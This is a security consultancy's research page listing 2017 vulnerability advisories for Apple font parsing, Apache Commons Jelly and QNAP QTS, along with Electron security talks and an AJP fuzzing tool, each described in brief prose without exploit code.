Research is one of our founding principles and we invest heavily in it. We aim to provide research-driven application security, enabling trust in our client's products and evolving the resilience of the digital ecosystem. By discovering new vulnerabilities and attack techniques, we constantly improve our capabilities and contribute to secure the applications we all use.

Advisory

cve-2017-13850

10/31/2017

macOS Font Importer Information Disclosure

10/31/2017

Doyensec researchers discovered a bug in Apple's macOS Font Importer. Parsing a malicious font file will result in memory corruption and information leakage.

Apple's original advisory: https://support.apple.com/en-us/HT208221

Advisory

cve-2017-13820

10/31/2017

macOS ATS Information Disclosure

10/31/2017

Doyensec researchers discovered a bug in Apple's macOS ATS. Parsing a malicious font file will result in memory corruption and information leakage.

Apple's original advisory: https://support.apple.com/en-us/HT208144

Advisory

cve-2017-12621

09/27/2017

Apache Commons Jelly XML External Entity (XXE)

09/27/2017

An XXE vulnerability was identified in Apache Commons Jelly by Doyensec researchers. During Jelly (xml) file parsing with Apache Xerces, if a custom doctype entity is declared with a "SYSTEM" entity with a URL and that entity is used in the body of the Jelly file, during parser instantiation the parser will attempt to connect to said URL. This could lead to XML External Entity (XXE) attacks.

Apache Commons' original advisory: http://commons.apache.org/proper/commons-jelly/security-reports.html#CVE-2017-12621

Advisory

cve-2017-xxxx

09/12/2017

QNAP QTS 4.3.3 arbitrary file retrieval (as root)

09/12/2017

An arbitrary file retrieval vulnerability was identified in QNAP QTS 4.3.3 File Manager. This functionality can be abused to download arbitrary files from the NAS filesystem as root, leading to system compromise.

Download the advisory PDF file: Doyensec_Advisory_QNAPQTS4.3_FileRetrieval.pdf

Publication

slides

07/27/2017

Electronegativity - A Study of Electron Security
Black Hat USA 2017 (Las Vegas, Nevada)

07/27/2017

Download the presentation PDF file: us-17-Carettoni-Electronegativity-A-Study-Of-Electron-Security.pdf

Despite all predictions, native Desktop apps are back. After years porting stand-alone apps to the web, we are witnessing an inverse trend. Many companies have started providing native desktop apps built using the same technologies as their web counterparts. In this trend, Github's Electron has become a popular framework to build cross-platform desktop apps with JavaScript, HTML, and CSS. While it seems to be easy, embedding a webapp in a self-contained web environment (Chromium, Node.Js) introduces new security challenges. In this presentation, we will illustrate Electron's security model and describe current isolation mechanisms to prevent untrusted content from using Node.js primitives. Electron's IPC messaging, preloading and other internals will be comprehensively discussed. BrowserWindow and WebView security-relevant options will be also analyzed, together with design-level weaknesses and implementation bugs in Electron.

Publication

whitepaper

07/27/2017

Electron Security Checklist - A guide for developers and auditors
Black Hat USA 2017 (Las Vegas, Nevada)

07/27/2017

Download the whitepaper PDF file: us-17-Carettoni-Electronegativity-A-Study-Of-Electron-Security-wp.pdf

This document introduces a checklist of security anti-patterns and must-have features to illustrate misconfigurations and vulnerabilities in Electron-based applications. Software developers and security auditors can benefit from this document as it provides a concise, yet comprehensive, summary of potential weaknesses and implementation bugs when developing applications using Electron.

Advisory

cve-2017-2379

04/11/2017

macOS, iOS, tvOS, watchOS CarbonCore Buffer Overflow

04/11/2017

A memory corruption vulnerability was identified in a core component of Apple's font parsing - CarbonCore. This issue could allow an attacker to execute code during the parsing of a malicious Datafork TrueType font.

Download the advisory PDF file: Doyensec_Advisory_FontParsingOSX.pdf

Advisory

cve-2017-2435

04/11/2017

macOS, iOS, tvOS, watchOS CoreText Corrupted Loop Index

04/11/2017

A memory corruption vulnerability was identified in a core component of Apple's font parsing - CoreText. Through a malicious True Type Collection (ttc) font file, CoreText will enter a loop unintentionally referencing out of bounds memory.

Download the advisory PDF file: Doyensec_Advisory_FontParsingOSX.pdf

Advisory

cve-2017-2439

04/11/2017

macOS, iOS, tvOS, watchOS FontParser Infoleak

04/11/2017

An information leakage vulnerability (out-of-bounds read) was discovered in Apple's FontParser, which could allow an attacker to disclose the process memory. This issue could facilitate further exploitation.

Download the advisory PDF file: Doyensec_Advisory_FontParsingOSX.pdf

Advisory

cve-2017-2450

04/11/2017

macOS, iOS, tvOS, watchOS CoreText Infoleak

04/11/2017

An information leakage vulnerability (out-of-bounds read) was discovered in Apple's CoreText, which could allow an attacker to disclose the process memory. This issue could facilitate further exploitation.

Download the advisory PDF file: Doyensec_Advisory_FontParsingOSX.pdf

Publication

slides

03/30/2017

Application security recipes for fast paced environments
Computerworld SEMAFOR 2017 (Warsaw, Poland)

03/30/2017

Download the presentation PDF file: Application_Security_Recipes_for_Fast-Paced_Environments.pdf

Ensuring the security of web applications in continuous delivery environments is an open challenge for many organizations. In fast-paced environments (e.g. startups, agile SDLC shops, etc.), traditional application security practices can slow continuous delivery or simply not address security at all. Instead, a new approach based on security automation and tactical security testing is required to make sure that important components are tested before going live. In this presentation, I will illustrate a few examples on how Silicon Valley-based startups approach security testing while seeking the perfect balance between compliance, security and business productivity.

Code

ajpfuzzer

02/27/2017

A command-line fuzzer for the Apache JServ Protocol (ajp13)

02/27/2017

AJPFuzzer is a rudimental fuzzer for the Apache JServ Protocol, also known as 'ajp13'. Built on top of libajp13, the tool allows you to create and send AJP messages using an easy-to-use command line interface. AJPFuzzer can craft properly formatted AJP13 messages (all message types) as well as mutations (e.g. bit flipping, messages with type mismatch, etc.), which facilitates security testing efforts targeting AJP-based services like web servers AJP modules, J2EE containers, and many others.

Download the source and binary from AJPFuzzer's Github page

Code

libajp13

02/27/2017

A complete AJPv1.3 Java library

02/27/2017

libajp13 is a fully featured open source library implementing the Apache JServ Protocol version 1.3 (ajp13), based on the Apache Protocol Reference. Thanks to libajp13, it is now possible to craft properly formatted AJP binary packets with a single line of code.

Download the source and binary from libajp13's Github page

US Office
1250 Clay Street, Suite 208
94108 San Francisco - USA

John Villamil
john@doyensec.com

EMEA Office
Ul. Florianska 6, Suite 1B
03-707 Warsaw - Poland

Luca Carettoni
luca@doyensec.com

When working with Doyensec, you will be working directly with its founders. We are the points of contact, the negotiators, the problem solvers, and the hackers.

For proposals or questions: info@doyensec.com or +1 (628) 333 9093